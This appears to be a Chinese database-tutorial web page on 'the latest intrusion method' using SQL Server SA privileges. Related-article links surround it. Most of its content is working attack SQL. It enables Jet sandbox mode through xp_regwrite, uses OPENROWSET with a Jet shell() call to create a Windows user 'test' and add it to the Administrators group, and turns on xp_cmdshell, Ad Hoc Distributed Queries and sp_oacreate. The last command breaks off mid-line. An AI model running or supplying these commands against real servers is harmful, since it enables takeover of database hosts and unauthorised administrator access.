解讀SQL Server SA權限最新入侵方法_Mssql數據庫教程
推薦:通過事務日志解決SQL Server常見四大故障(一)當系統出現故障時,只要存在數據日志那么就可以利用它來恢復數據解決數據庫故障。作為SQL Server數據庫管理員,了解數據日志文件的作用,以及如何利用它來解決一些數據庫的常見故障,這非常重要。既然事務日志這么重要,那么他到底可以用來做什么事情呢?口說
使用jet沙盤模式,可以解決XP_cmdshell等存儲過程和相關動態鏈接庫帶來的煩惱。出于安全原因,系統默認情況下沙盤模式未開啟,這就需要xp_regwrite開啟沙盤模式:
Exec master.dbo.xp_regwrite ''HKEY_LOCAL_MACHINE'',''SOFTWARE\Microsoft\Jet\4.0
\Engines'',''SandBoxMode'',''REG_DWORD'',1 |
然后執行沙盤命令,在系統添加一個用戶名為test,密碼為1234的用戶:
select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:\windows
\system32\ias\ias.mdb'',''select shell("cmd.exe /c net user test 1234 /add")'') select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:\windows \system32\ias\ias.mdb'',''select shell("cmd.exe /c net localgroup administrators test /add")'') |
不同的,路徑也不一樣,需要根據情況做修改:操作系統
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
另外Microsoft SQL Server2005在默認情況下,一些存儲過程是關閉著的,需要命令打開:
開啟XP_cmdshell:
EXEC sp_configure ''show advanced options'', 1;RECONFIGURE;EXEC sp_configure
''xp_cmdshell'', 1;RECONFIGURE; |
開啟''OPENROWSET'':
exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp_configure
''Ad Hoc Distributed Queries'',1;RECONFIGURE; |
開啟''sp_oacreate'':
exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp |
分享:通過事務日志解決SQL Server常見四大故障(二)數據庫鏡像方案有兩種鏡像運行模式。一種是
- sql 語句練習與答案
- 深入C++ string.find()函數的用法總結
- SQL Server中刪除重復數據的幾個方法
- sql刪除重復數據的詳細方法
- SQL SERVER 2000安裝教程圖文詳解
- 使用sql server management studio 2008 無法查看數據庫,提示 無法為該請求檢索數據 錯誤916解決方法
- SQLServer日志清空語句(sql2000,sql2005,sql2008)
- Sql Server 2008完全卸載方法(其他版本類似)
- sql server 2008 不允許保存更改,您所做的更改要求刪除并重新創建以下表
- SQL Server 2008 清空刪除日志文件(瞬間日志變幾M)
- Win7系統安裝MySQL5.5.21圖解教程
- 將DataTable作為存儲過程參數的用法實例詳解
- 相關鏈接:
- 教程說明:
Mssql數據庫教程-解讀SQL Server SA權限最新入侵方法。